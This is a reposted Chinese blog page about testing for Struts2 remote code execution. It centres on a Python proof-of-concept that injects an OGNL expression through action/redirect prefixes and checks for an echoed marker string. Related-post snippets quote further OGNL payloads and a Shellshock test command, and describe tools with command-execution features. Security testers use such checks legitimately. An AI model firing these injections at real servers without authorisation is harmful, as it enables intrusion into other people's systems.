struts2漏洞以及测试

最新推荐文章于 2025-08-08 22:01:10 发布
转载 最新推荐文章于 2025-08-08 22:01:10 发布 · 179 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/jiancanxuepiao/p/3198376.html
文章标签:

#java

本文介绍了一个用于验证Struts2远程代码执行漏洞的PoC代码实现。该PoC通过构造特定的HTTP请求来触发漏洞,并检查返回的数据中是否包含预定义的随机字符串以确定目标系统是否存在此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

# coding: utf-8
import string
import random
import urllib


def poc(url):
    bait = "".join(random.sample(list(string.letters), 32))

    poc = urllib.quote("%{")
    poc += urllib.quote("#test_str=new java.lang.String('{0}'),".format(bait))
    poc += urllib.quote("#a_resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),")
    poc += urllib.quote("#a_resp.getWriter().println(#test_str),")
    poc += urllib.quote("#a_resp.getWriter().flush(),")
    poc += urllib.quote("#a_resp.getWriter().close()")
    poc += urllib.quote("}")

    for prefix in ["action:", "redirect:", "redirectAction:"]:
        if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, poc)).read():
            return True

    return False


if __name__ == "__main__":
    import sys
    print poc(sys.argv[1])

 

转载于:https://www.cnblogs.com/jiancanxuepiao/p/3198376.html

Struts2漏洞利用工具-可用于检测
08-01
直接输入出现漏洞的url即可攻击. 远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均构成完全影响。建议大家升级最新jar包!
Struts2漏洞检测(带自己编写使用说明一看就上手)
05-04
Struts2漏洞检测(带自己编写使用说明一看就上手),IP地址段批量端口扫描
struts2-验证(手工)
weixin_30546933的博客
05-17 142
struts2校验有两种实现方法:   1. 手工编写代码实现(基本验证)    2. 基于XML配置方式实现(验证框架) 基本验证(对action的所有方法进行校验)    Action中 * 要继承ActionSupport * 重写Validateable接口中的validate()方法 ,在该方法中完成验证 * 步骤如下:   * validate...
Struts2漏洞检测包---面工具手工检测
12-23
通过发包工具,在ACtion后面加上我的包就行了.
Struts2漏洞检查工具
02-14
struts2检查和利用工具!
Struts2漏洞测试
04-18
Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试...
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和网络安全专业人员识别并修复Struts2框架中的安全问题。 Struts2的安全漏洞主要包括以下几类: 1. OGNL(Object-...
Struts2漏洞测试工具
07-23
Struts2系列漏洞测试工具
struts2漏洞验证工具-GUI全版本
09-26
5、对不同的struts2漏洞测试语句做了大量修改,执行命令、上传功能已经能通用。 6、支持GET、POST、UPLOAD三种请求方法,您可以自由选择。(UPLOAD为Multi-Part方式提交) 适用于渗透测试工程师、网络安全爱好者
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
渗透测试是网络安全的重要环节,通过使用这样的工具,不仅可以帮助开发者找出并修复Struts 2中的漏洞,还能提高整体的安全意识,建立更为健壮的安全防御体系。对于企业来说,定期进行这样的安全检查,可以降低被黑客...
Struts2漏洞检查工具2017版.zip
07-24
警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! Struts2漏洞检查工具2017版 V2.0 by 安恒信息应急响应中心。支持S2-032,S2-037,S2-016,S2-019,S2-045,S2-046,S2-048漏洞验证。有对漏洞的命令执行功能、文件上传功能。还有批量验证功能。增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。增加S2-048 Struts 2.3.X,支持检查官方示例struts2-showcase应用的代码执行漏洞。增加安恒信息研究员nike.zheng发现的S2-045。jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。
struts2漏洞检测工具
03-21
struts2漏洞检测工具
Struts2漏洞检测工具2018最新版
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测
S2-007 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 1443
漏洞原理 如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 POC a.获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} b、获取web路径 %{ #req=@org.apache.struts2...
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
热门推荐
剁椒鱼头没剁椒的博客
02-06 1万+
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
墨者学院中的一些漏洞复现
weixin_43940853的博客
09-15 719
Bash漏洞分析溯源 bash漏洞本质上是一个任意代码执行漏洞,是存在于linux命令行下的一种输出漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test 若存在该漏洞,正常情况下会输出(版本号小于bash 4.3的linux或者unix系统上执行以上命令) vulnerable this is a test 这里只是...
struts2漏洞s2-045漏洞利用测试
feinifi的博客
02-20 6502
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达...
struts2漏洞批量检查
oscarli的博客
11-21 7105
检查代码来自 Lucifer。#!/usr/bin/env python # coding=utf-8 # code by Lucifer # Date 2017/10/12 import sys import base64 import warnings import requests from termcolor import cprint warnings.filterwarnings("
Java集合中的链表
最新发布
Y409001的博客
08-08 533
本文详细介绍了Java中LinkedList的实现原理及其应用。首先分析了ArrayList在插入删除操作上的效率问题,引出链表结构的必要性。文章详细讲解了单向链表的基本概念、8种链表结构分类,以及不带头单向链表的具体实现,包括节点定义、接口设计和基本操作方法(增删改查)。重点说明了头插法、尾插法和任意位置插入的实现细节与注意事项。最后提供了9个链表相关的经典面试题及其解决方案,包括链表反转、中间节点查找、回文判断、环检测等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值